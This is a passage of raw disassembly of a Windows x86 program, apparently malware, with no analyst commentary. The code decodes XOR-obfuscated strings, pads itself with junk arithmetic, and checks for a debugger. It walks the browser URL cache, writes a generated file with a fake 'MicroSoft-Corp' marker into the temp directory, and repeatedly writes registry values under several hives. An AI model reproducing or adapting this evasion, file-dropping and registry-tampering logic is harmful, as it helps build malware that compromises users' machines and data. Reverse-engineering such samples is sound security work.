call sub_40C9F4 ; DATA XREF: sub_43F5C1�r
loc_40527C: ; DATA XREF: sub_43F5CD�r
add esp, 0Ch
xor edi, edi ; DATA XREF: sub_43F5D9�r
jmp short loc_40529A
; ---------------------------------------------------------------------------
loc_405283: ; CODE XREF: sub_405254:loc_40529C�j
; DATA XREF: sub_43F5E5�r
mov eax, dword_4412BC
add eax, edi
lea eax, ds:418710h[eax] ; DATA XREF: sub_43F5F1�r
movsx edx, byte ptr [eax]
xor edx, 2Ch
mov [eax], dl
inc edi
loc_40529A: ; CODE XREF: sub_405254+2D�j
cmp edi, esi
loc_40529C: ; DATA XREF: sub_43F5FD�r
jl short loc_405283
mov [ebp+var_8], 1BFh
mov eax, dword_4412BC ; DATA XREF: sub_43F6B9�r
add eax, esi
loc_4052AC: ; DATA XREF: sub_43F6C5�r sub_43F6D1�r
mov byte ptr ds:dword_418710[eax], 0
loc_4052B4: ; DATA XREF: sub_43F6DD�r sub_43F6E9�r
mov edi, dword_4412BC
mov eax, edi
loc_4052BC: ; DATA XREF: sub_43F6F5�r
lea eax, [eax+esi+1]
loc_4052C0: ; DATA XREF: sub_43F701�r sub_43F70D�r
mov dword_4412BC, eax
inc dword_4412BC ; DATA XREF: sub_43F719�r
cmp dword_4412BC, 0E06h ; DATA XREF: sub_43F725�r
; sub_43F731�r ...
jle short loc_4052DE
and dword_4412BC, 0 ; DATA XREF: sub_43F749�r sub_43F755�r
loc_4052DE: ; CODE XREF: sub_405254+81�j
; DATA XREF: sub_43F761�r ...
mov [ebp+var_C], 0B4h
lea eax, dword_418710[edi] ; DATA XREF: sub_43F779�r
pop edi
loc_4052EC: ; DATA XREF: sub_43F785�r
pop esi
leave
retn
sub_405254 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052EF proc near ; CODE XREF: sub_4062CD+4E4�p
; sub_4062CD+501�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
loc_4052F0: ; DATA XREF: sub_43F791�r
mov ebp, esp
sub esp, 10h ; DATA XREF: sub_43F79D�r
push esi
push edi
mov [ebp+var_2], 665Dh ; DATA XREF: sub_43F7A9�r
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax ; DATA XREF: sub_43F7B5�r
mov eax, edx
mov [ebp+var_2], ax ; DATA XREF: sub_43F7C1�r
call sub_40C538 ; DATA XREF: sub_43F7CD�r
loc_405310: ; DATA XREF: sub_43F7D9�r
push 0
push 80h ; DATA XREF: sub_43F7E5�r
push 4 ; DATA XREF: sub_43F7F1�r
push 0
push 0 ; DATA XREF: sub_43F7FD�r
push 0C0000000h ; DATA XREF: sub_43F809�r
push [ebp+arg_0] ; DATA XREF: sub_43F815�r
call sub_40C67C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_405335 ; DATA XREF: sub_43F821�r
xor eax, eax
jmp short loc_40539D ; DATA XREF: sub_43F82D�r
; ---------------------------------------------------------------------------
loc_405335: ; CODE XREF: sub_4052EF+40�j
; DATA XREF: sub_43F839�r
mov esi, 5B97h
mov eax, 24A5h ; DATA XREF: sub_43F845�r
mul esi ; DATA XREF: sub_43F851�r
mov [ebp+var_C], eax
loc_405344: ; DATA XREF: sub_43F85D�r
mov esi, eax
push 2
loc_405348: ; DATA XREF: sub_43F869�r
push 0
push 0
loc_40534C: ; DATA XREF: sub_43F875�r
push edi
call sub_40C6AC ; DATA XREF: sub_43F881�r
mov esi, 113Bh ; DATA XREF: sub_43F88D�r
mov eax, esi ; DATA XREF: sub_43F899�r
add eax, esi
mov esi, eax
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8] ; DATA XREF: sub_43F8A5�r
push [ebp+arg_4] ; DATA XREF: sub_43F8B1�r
push edi
call sub_40C730 ; DATA XREF: sub_43F8BD�r
mov esi, 27C4h ; DATA XREF: sub_43F8C9�r
loc_405374: ; DATA XREF: sub_43F8D5�r sub_43F8E1�r
mov eax, 6888h
mul esi
mov [ebp+var_10], eax ; DATA XREF: sub_43F8ED�r
mov esi, eax
loc_405380: ; DATA XREF: sub_43F8F9�r
push edi
call sub_40C55C ; DATA XREF: sub_43F905�r
mov [ebp+var_4], 3676h ; DATA XREF: sub_43F911�r
loc_40538C: ; DATA XREF: sub_43F91D�r
movzx eax, [ebp+var_4]
loc_405390: ; DATA XREF: sub_43F929�r
mov edx, eax
add edx, eax
loc_405394: ; DATA XREF: sub_43F935�r
mov eax, edx
mov [ebp+var_4], ax ; DATA XREF: sub_43F941�r
xor eax, eax
inc eax
loc_40539D: ; CODE XREF: sub_4052EF+44�j
pop edi
pop esi
leave
retn
sub_4052EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053A1 proc near ; CODE XREF: sub_4062CD+440�p
var_2F52 = word ptr -2F52h
var_2F50 = byte ptr -2F50h
var_2F48 = word ptr -2F48h
var_2F46 = word ptr -2F46h
var_2F43 = byte ptr -2F43h
var_1F44 = dword ptr -1F44h
var_1F40 = byte ptr -1F40h
var_1F3C = dword ptr -1F3Ch
var_1F38 = dword ptr -1F38h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2F54h
call sub_40C498
push ebx
push esi
push edi
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_2F50]
lea esi, aW_07ye ; "W _07ye"
movsd
movsd
push [ebp+arg_0]
lea eax, [ebp+var_2F43]
push eax
call sub_40C4B8
call sub_40C5A4 ; GetVersion
push 1
push offset byte_446463
call sub_405254
mov edi, 0Fh
sub edi, dword_4412B8
push edi
push eax
lea edi, [ebp+var_2F43]
push edi
call sub_401806
add esp, 14h
mov edi, eax
mov [ebp+var_2F48], di
mov [ebp+var_2F46], 4FF8h
add [ebp+var_2F46], 611Eh
movzx eax, [ebp+var_2F48]
cmp eax, 0FFFFh
jz short loc_405438
movzx eax, [ebp+var_2F48]
mov [ebp+eax+var_2F43], 0
loc_405438: ; CODE XREF: sub_4053A1+86�j
mov [ebp+var_1F44], 1F40h
call sub_40C574 ; GetProcessHeap
push 3
push offset byte_44645F
call sub_405254
add esp, 8
lea edi, [ebp+var_1F44]
push edi
lea edi, [ebp+var_1F40]
push edi
push eax
call sub_40BA18 ; FindFirstUrlCacheEntryA
mov ebx, eax
or eax, eax
jz loc_405522
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40C9C4
add esp, 8
or eax, eax
jnz short loc_4054AF
call sub_40C598 ; GetTickCount
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C4B8
call sub_40C538 ; RtlGetLastWin32Error
xor eax, eax
inc eax
jmp short loc_405522
; ---------------------------------------------------------------------------
loc_4054AF: ; CODE XREF: sub_4053A1+EF�j
; sub_4053A1:loc_40551E�j
call sub_40C574 ; GetProcessHeap
mov [ebp+var_1F44], 1F40h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_1F44]
push eax
lea eax, [ebp+var_1F40]
push eax
push ebx
call sub_40BA24 ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_405520
call sub_40C514 ; GetCurrentThreadId
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40C9C4
add esp, 8
or eax, eax
jnz short loc_40551E
mov ax, word_4412CC
mov [ebp+var_2F52], ax
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C4B8
call sub_40C598 ; GetTickCount
xor eax, eax
inc eax
jmp short loc_405522
; ---------------------------------------------------------------------------
loc_40551E: ; CODE XREF: sub_4053A1+156�j
jmp short loc_4054AF
; ---------------------------------------------------------------------------
loc_405520: ; CODE XREF: sub_4053A1+138�j
xor eax, eax
loc_405522: ; CODE XREF: sub_4053A1+CD�j
; sub_4053A1+10C�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4053A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405527 proc near ; CODE XREF: sub_405601+5D8�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_14]
lea esi, aXaBi ; "#Xa/I"
mov ecx, 7
rep movsb
push [ebp+arg_0]
call sub_40C73C ; lstrlenA
mov [ebp+var_8], eax
mov [ebp+var_D], 0Dh
add [ebp+var_D], 1
mov edi, eax
shl edi, 1
add edi, 8
push edi
push 40h
call sub_40C64C ; LocalAlloc
mov [ebp+var_C], eax
xor ebx, ebx
jmp short loc_405585
; ---------------------------------------------------------------------------
loc_405569: ; CODE XREF: sub_405527+61�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+ebx]
xor eax, 71h
or eax, eax
jz short loc_405584
mov eax, ebx
add eax, [ebp+arg_0]
movzx edx, byte ptr [eax]
xor edx, 71h
mov [eax], dl
loc_405584: ; CODE XREF: sub_405527+4E�j
inc ebx
loc_405585: ; CODE XREF: sub_405527+40�j
cmp ebx, [ebp+var_8]
jb short loc_405569
mov [ebp+var_2], 0
jmp short loc_4055EB
; ---------------------------------------------------------------------------
loc_405592: ; CODE XREF: sub_405527+CB�j
push 6
push offset a_OO ; "\t_\tO\tO"
call sub_405254
mov [ebp+var_18], eax
movzx edi, [ebp+var_2]
mov esi, [ebp+arg_0]
movzx edi, byte ptr [esi+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_1C], edx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_C]
push edi
mov esi, [ebp+var_18]
push esi
push edi
call sub_40CA30
add esp, 1Ch
inc [ebp+var_2]
loc_4055EB: ; CODE XREF: sub_405527+69�j
movzx eax, [ebp+var_2]
cmp eax, [ebp+var_8]
jb short loc_405592
call sub_40C514 ; GetCurrentThreadId
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_405527 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405601 proc near ; CODE XREF: sub_4062CD+176�p
var_300B4 = dword ptr -300B4h
var_300B0 = dword ptr -300B0h
var_300AC = dword ptr -300ACh
var_300A7 = byte ptr -300A7h
var_300A4 = dword ptr -300A4h
var_300A0 = dword ptr -300A0h
var_3009A = word ptr -3009Ah
var_30098 = dword ptr -30098h
var_30094 = dword ptr -30094h
var_30090 = dword ptr -30090h
var_3008C = dword ptr -3008Ch
var_30088 = dword ptr -30088h
var_30084 = dword ptr -30084h
var_30080 = word ptr -30080h
var_3007B = byte ptr -3007Bh
var_30073 = byte ptr -30073h
var_30072 = byte ptr -30072h
var_3006A = byte ptr -3006Ah
var_30063 = byte ptr -30063h
var_3005E = dword ptr -3005Eh
var_3005A = byte ptr -3005Ah
var_30053 = word ptr -30053h
var_30050 = word ptr -30050h
var_3004D = byte ptr -3004Dh
var_3004C = word ptr -3004Ch
var_3004A = byte ptr -3004Ah
var_30040 = byte ptr -30040h
var_30036 = word ptr -30036h
var_30034 = dword ptr -30034h
var_30030 = dword ptr -30030h
var_3002C = dword ptr -3002Ch
var_30025 = byte ptr -30025h
var_30024 = dword ptr -30024h
var_3001D = byte ptr -3001Dh
var_3001C = dword ptr -3001Ch
var_30018 = dword ptr -30018h
var_30014 = dword ptr -30014h
var_30010 = dword ptr -30010h
var_3000C = byte ptr -3000Ch
var_2000C = dword ptr -2000Ch
var_20008 = dword ptr -20008h
var_20003 = byte ptr -20003h
var_10004 = dword ptr -10004h
var_10000 = byte ptr -10000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 300B4h
call sub_40C498
push ebx
push esi
push edi
mov ax, word_4412D5
mov [ebp+var_30050+1], ax
and [ebp+var_30024], 0
mov [ebp+var_30025], 97h
add [ebp+var_30025], 1
and [ebp+var_2000C], 0
and [ebp+var_30014], 0
lea eax, [ebp+var_10004]
push eax
push [ebp+arg_4]
call sub_401A36
add esp, 8
mov ebx, eax
mov eax, [ebp+var_10004]
or eax, eax
jz short loc_405668
or ebx, ebx
jz short loc_405668
cmp [ebp+arg_14], eax
jb short loc_4056A5
loc_405668: ; CODE XREF: sub_405601+5C�j
; sub_405601+60�j
mov [ebp+var_30080], 6D59h
movzx eax, [ebp+var_30080]
imul eax, 0CC8h
mov [ebp+var_30080], ax
push ebx
call sub_40C658 ; LocalFree
mov [ebp+var_30084], 2194h
inc [ebp+var_30084]
mov [ebp+var_30024], 1
loc_4056A5: ; CODE XREF: sub_405601+65�j
push [ebp+arg_C]
call sub_40C73C ; lstrlenA
mov [ebp+var_30084], eax
mov eax, 64h
mul [ebp+var_10004]
mov [ebp+var_30088], eax
mov edi, [ebp+var_30084]
imul edi, [ebp+var_30084], 32h
mov esi, [ebp+var_30088]
lea edi, [esi+edi+1000h]
push edi
push 40h
call sub_40C64C ; LocalAlloc
mov [ebp+var_20008], eax
mov [ebp+var_30030], 1459h
sub [ebp+var_30030], 3900h
mov ax, word_4412D7
mov [ebp-30051h], ax
mov ax, word_4412D9
mov [ebp+var_30053], ax
push [ebp+arg_0]
push 104h
call sub_40C58C ; GetTempPathA
mov [ebp+var_30034], 6721h
add [ebp+var_30034], 7499h
mov eax, [ebp+arg_0]
mov [ebp+var_3008C], eax
mov ecx, eax
or eax, 0FFFFFFFFh
loc_405749: ; CODE XREF: sub_405601+14D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405749
mov edi, eax
mov esi, 10h
sub esi, dword_4412B4
push esi
mov esi, [ebp+var_3008C]
add esi, edi
push esi
call sub_40170F
add esp, 8
push 4
push offset byte_446453
call sub_405254
add esp, 8
push eax
push [ebp+arg_0]
call sub_40CA54
add esp, 8
push 6
push offset dword_44644C
call sub_405254
add esp, 8
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
push 6
push offset byte_446445
call sub_405254
add esp, 8
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
mov [ebp+var_30036], 4962h
sub [ebp+var_30036], 55C0h
push 13h
push offset byte_446431
call sub_405254
add esp, 8
push [ebp+arg_1C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
add esp, 10h
lea edi, [ebp+var_3005A]
lea esi, aMkQe9 ; "mk,qe9"
mov ecx, 7
rep movsb
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
mov eax, off_4412E2
mov [ebp+var_3005E], eax
push 7
push offset word_44641A
call sub_405254
add esp, 8
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C538 ; RtlGetLastWin32Error
push 6
push offset byte_446413
call sub_405254
add esp, 8
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_30063]
lea esi, aK_0 ; "K &,"
mov ecx, 5
rep movsb
push 5
push offset byte_44640D
call sub_405254
add esp, 8
mov [ebp+var_30090], eax
call sub_40CA18
mov ecx, 3E8h
cdq
idiv ecx
push edx
mov edi, [ebp+var_30090]
push [ebp+var_30090]
lea edi, [ebp+var_30040]
push edi
call sub_40CA30
add esp, 0Ch
push 2Ah
push offset word_4463E2
call sub_405254
add esp, 8
lea edi, [ebp+var_30040]
push edi
push [ebp+arg_8]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
add esp, 10h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C598 ; GetTickCount
push 2Dh
push offset dword_4463B4
call sub_405254
add esp, 8
mov [ebp+var_30094], eax
call sub_40CA18
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 14h
push edi
mov edi, [ebp+var_30094]
push [ebp+var_30094]
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
add esp, 0Ch
mov [ebp+var_30018], 64D8h
mov eax, [ebp+var_30018]
mov edx, eax
add edx, eax
mov [ebp+var_30018], edx
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C574 ; GetProcessHeap
cmp [ebp+var_30024], 0
jnz loc_405C81
cmp [ebp+arg_18], 0
jz loc_405B0E
mov ax, word_4412EB
mov [ebp+var_3009A], ax
and [ebp+var_30098], 0
jmp loc_405AF1
; ---------------------------------------------------------------------------
loc_4059B8: ; CODE XREF: sub_405601+4FC�j
lea edi, [ebp+var_300A7]
lea esi, byte_4412ED
mov ecx, 3
rep movsb
mov [ebp+var_10000], 0
mov [ebp+var_300A4], 4DFDh
mov eax, 5Dh
mul [ebp+var_300A4]
mov [ebp+var_300AC], eax
mov [ebp+var_300A4], eax
and [ebp+var_300A0], 0
jmp loc_405A93
; ---------------------------------------------------------------------------
loc_4059FF: ; CODE XREF: sub_405601+49C�j
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+var_30098]
add eax, [ebp+var_300A0]
cmp eax, [ebp+var_10004]
jnb loc_405AA3
push 6
push offset a_OO ; "\t_\tO\tO"
call sub_405254
mov [ebp+var_300B0], eax
mov edi, [ebp+var_30098]
add edi, [ebp+var_300A0]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_300B4], edx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_10000]
push edi
mov edi, [ebp+var_300B0]
push edi
lea edi, [ebp+var_10000]
push edi
call sub_40CA30
add esp, 1Ch
call sub_40C598 ; GetTickCount
inc [ebp+var_300A0]
loc_405A93: ; CODE XREF: sub_405601+3F9�j
cmp [ebp+var_300A0], 80h
jb loc_4059FF
loc_405AA3: ; CODE XREF: sub_405601+415�j
push 30h
push offset byte_446383
call sub_405254
push [ebp+var_2000C]
push [ebp+arg_10]
lea edi, [ebp+var_10000]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 24h
add [ebp+var_30098], 80h
inc [ebp+var_2000C]
loc_405AF1: ; CODE XREF: sub_405601+3B2�j
mov eax, [ebp+var_10004]
cmp [ebp+var_30098], eax
jb loc_4059B8
mov [ebp+var_30014], eax
jmp loc_405C81
; ---------------------------------------------------------------------------
loc_405B0E: ; CODE XREF: sub_405601+398�j
mov word ptr [ebp+var_30098+2], 0E7h
sub word ptr [ebp+var_30098+2], 3C4h
mov eax, [ebp+arg_14]
mov [ebp+var_10004], eax
jmp loc_405C5D
; ---------------------------------------------------------------------------
loc_405B2E: ; CODE XREF: sub_405601+67A�j
call sub_40C598 ; GetTickCount
cmp [ebp+var_10000], 0
jz loc_405C5D
mov byte ptr [ebp+var_30098+1], 8Bh
movzx eax, byte ptr [ebp+var_30098+1]
imul eax, 0C29h
mov byte ptr [ebp+var_30098+1], al
mov eax, [ebp+arg_14]
add eax, 0C800h
cmp [ebp+var_10004], eax
jnb loc_405C81
mov eax, [ebp+var_10004]
mov [ebp+var_30014], eax
push 3
push offset byte_44637F
call sub_405254
push [ebp+arg_C]
push eax
lea edi, [ebp+var_3000C]
push edi
call sub_40CA30
add esp, 14h
lea ecx, [ebp+var_3000C]
or eax, 0FFFFFFFFh
loc_405BA2: ; CODE XREF: sub_405601+5A6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405BA2
mov edi, eax
mov [ebp+var_3009A], di
lea eax, [ebp+var_10000]
push eax
movzx eax, [ebp+var_3009A]
lea eax, [ebp+eax+var_3000C]
push eax
call sub_40C4B8
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebp+var_3000C]
push eax
call sub_405527
add esp, 4
mov [ebp+var_30010], eax
call sub_40C5A4 ; GetVersion
push 30h
push offset byte_446383
call sub_405254
add esp, 8
push [ebp+var_2000C]
push [ebp+arg_10]
push [ebp+var_30010]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
add esp, 14h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C574 ; GetProcessHeap
push [ebp+var_30010]
call sub_40C658 ; LocalFree
lea edi, [ebp+var_300A4+3]
lea esi, aCcvJ8 ; "cc j8"
mov ecx, 7
rep movsb
inc [ebp+var_2000C]
loc_405C5D: ; CODE XREF: sub_405601+528�j
; sub_405601+539�j
lea eax, [ebp+var_10000]
push eax
push [ebp+var_10004]
push ebx
call sub_401B9A
add esp, 0Ch
mov [ebp+var_10004], eax
or eax, eax
jnz loc_405B2E
loc_405C81: ; CODE XREF: sub_405601+38E�j
; sub_405601+508�j ...
push 1Eh
push offset dword_446360
call sub_405254
push eax
push [ebp+var_20008]
call sub_40494F
lea edi, [ebp+var_3006A]
lea esi, aTbrgnn ; "tRnn"
mov ecx, 7
rep movsb
push 7
push offset dword_446358
call sub_405254
push eax
push [ebp+var_20008]
call sub_40494F
call sub_40C574 ; GetProcessHeap
push 8
push offset byte_44634F
call sub_405254
push eax
push [ebp+var_20008]
call sub_404663
call sub_40C514 ; GetCurrentThreadId
lea edi, [ebp+var_30072]
lea esi, aHz_B ; "hZ.*~b!"
movsd
movsd
push 6
push offset dword_446348
call sub_405254
mov [ebp+var_30098], eax
call sub_40CA18
mov [ebp-3009Ch], eax
call sub_40CA18
mov ecx, 63h
cdq
idiv ecx
push edx
mov edi, [ebp-3009Ch]
mov eax, edi
mov ecx, 14h
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_30098]
push edi
lea edi, [ebp+var_3004A]
push edi
call sub_40CA30
push 0Eh
push offset byte_446339
call sub_405254
lea edi, [ebp+var_3004A]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
mov [ebp+var_3004C], 7B91h
inc [ebp+var_3004C]
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404663
mov [ebp+var_3001C], 5751h
mov eax, [ebp+var_3001C]
mov edx, eax
add edx, eax
mov [ebp+var_3001C], edx
push 15h
push offset byte_446323
call sub_405254
lea edi, [ebp+var_30040]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404663
mov [ebp+var_3004D], 60h
movzx eax, [ebp+var_3004D]
imul eax, 170Ah
mov [ebp+var_3004D], al
push 1
push offset byte_446321
call sub_405254
push eax
push [ebp+var_20008]
call sub_404663
lea edi, [ebp+var_30073]
lea esi, byte_441306
xor ecx, ecx
inc ecx
rep movsb
push 16h
push offset word_44630A
call sub_405254
mov [ebp+var_300A0], eax
call sub_40CA18
mov ecx, 3E8h
cdq
idiv ecx
mov edi, edx
add edi, 2710h
push edi
lea edi, [ebp+var_3004A]
push edi
mov edi, [ebp+var_300A0]
push edi
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404663
call sub_40C598 ; GetTickCount
push 9
push offset dword_446300
call sub_405254
push eax
push [ebp+var_20008]
call sub_40494F
push 7
push offset dword_4462F8
call sub_405254
push eax
push [ebp+var_20008]
call sub_40494F
lea edi, [ebp+var_3007B]
lea esi, aAxq@Mi ; "Axq@;mI"
mov ecx, 2
rep movsd
push 7
push offset dword_4462F0
call sub_405254
push eax
push [ebp+var_20008]
call sub_40CA54
call sub_40C538 ; RtlGetLastWin32Error
push [ebp+arg_0]
call sub_403449
add esp, 0E4h
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+arg_0]
call sub_40C67C ; CreateFileA
mov [ebp+var_3002C], eax
mov [ebp+var_3001D], 0DCh
movzx eax, [ebp+var_3001D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_3001D], al
push [ebp+var_20008]
call sub_40C73C ; lstrlenA
push 0
lea edi, [ebp+var_2000C]
push edi
push eax
push [ebp+var_20008]
push [ebp+var_3002C]
call sub_40C730 ; WriteFile
push [ebp+var_3002C]
call sub_40C55C ; CloseHandle
push [ebp+var_20008]
call sub_40C658 ; LocalFree
cmp [ebp+var_30024], 0
jnz short loc_405F69
push ebx
call sub_40C658 ; LocalFree
jmp short loc_405F6E
; ---------------------------------------------------------------------------
loc_405F69: ; CODE XREF: sub_405601+95E�j
or eax, 0FFFFFFFFh
jmp short loc_405F74
; ---------------------------------------------------------------------------
loc_405F6E: ; CODE XREF: sub_405601+966�j
mov eax, [ebp+var_30014]
loc_405F74: ; CODE XREF: sub_405601+96B�j
pop edi
pop esi
pop ebx
leave
retn
sub_405601 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F79 proc near ; CODE XREF: sub_4062CD:loc_4063F9�p
var_2125 = byte ptr -2125h
var_211E = byte ptr -211Eh
var_111F = byte ptr -111Fh
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_116 = byte ptr -116h
var_115 = byte ptr -115h
var_10E = dword ptr -10Eh
var_109 = byte ptr -109h
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
push ebp
mov ebp, esp
mov eax, 2128h
call sub_40C498
push esi
push edi
call sub_40C538 ; RtlGetLastWin32Error
mov eax, dword_44130F
mov [ebp+var_10E+1], eax
lea edi, [ebp+var_115]
lea esi, a7ynj ; " * 7YNJ"
movsd
movsd
and [ebp+var_108], 0
mov [ebp+var_101], 0
jmp loc_4060E5
; ---------------------------------------------------------------------------
loc_405FB9: ; CODE XREF: sub_405F79+174�j
mov [ebp+var_116], 0ABh
movzx eax, [ebp+var_116]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_116], al
push 44h
push offset byte_4462AB
call sub_405254
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40CA30
push 4
push offset word_4462A6
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_4015EB
mov [ebp+var_118], 3316h
inc [ebp+var_118]
push 4
push offset word_4462A6
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_4015EB
call sub_40C598 ; GetTickCount
push 4Dh
push offset dword_446258
call sub_405254
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40CA30
push 4
push offset word_4462A6
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_4015EB
call sub_40C5A4 ; GetVersion
push 4
push offset word_4462A6
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_4015EB
add esp, 0A8h
call sub_40C634 ; IsDebuggerPresent
add [ebp+var_101], 1
loc_4060E5: ; CODE XREF: sub_405F79+3B�j
mov al, [ebp+var_101]
cmp al, 5
jb loc_405FB9
call sub_40C5A4 ; GetVersion
cmp eax, 80000000h
jb short loc_406172
mov [ebp+var_11C], 3E8Eh
sub [ebp+var_11C], 398Ch
push 4Ch
push offset byte_44620B
call sub_405254
mov [ebp+var_120], eax
push 10h
push offset aNC_ibiCoi__ ; "n^C[_IbI[|^COI__"
call sub_405254
mov [ebp+var_124], eax
push 3
push offset word_4461F6
call sub_405254
push 1
mov edi, 12h
sub edi, dword_4412B8
push edi
push eax
mov edi, [ebp+var_124]
push edi
mov edi, [ebp+var_120]
push edi
push 80000003h
call sub_4015EB
add esp, 30h
jmp loc_406222
; ---------------------------------------------------------------------------
loc_406172: ; CODE XREF: sub_405F79+184�j
call sub_40C598 ; GetTickCount
lea edi, [ebp+var_2125]
lea esi, aCowt9n ; "cowt9N"
mov ecx, 7
rep movsb
lea eax, [ebp+var_111F]
push eax
call sub_40518F
call sub_40C634 ; IsDebuggerPresent
push 59h
push offset dword_44619C
call sub_405254
lea edi, [ebp+var_111F]
push edi
push eax
lea edi, [ebp+var_211E]
push edi
call sub_40CA30
mov [ebp+var_116], 0D3h
movzx eax, [ebp+var_116]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_116], al
and [ebp+var_120], 0
push 0Ch
push offset byte_44618F
call sub_405254
push 4
push 4
lea edi, [ebp+var_120]
push edi
push eax
lea edi, [ebp+var_211E]
push edi
push 80000003h
call sub_4015EB
add esp, 38h
mov [ebp+var_11C], 6405h
mov eax, [ebp+var_11C]
mov edx, eax
add edx, eax
mov [ebp+var_11C], edx
loc_406222: ; CODE XREF: sub_405F79+1F4�j
push 3Bh
push offset byte_446153
call sub_405254
mov [ebp+var_11C], eax
push 11h
push offset aK@cnm@y_iCjj@e ; "k@CNM@y_I^cJJ@EBI"
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
mov edi, [ebp+var_11C]
push edi
push 80000001h
call sub_4015EB
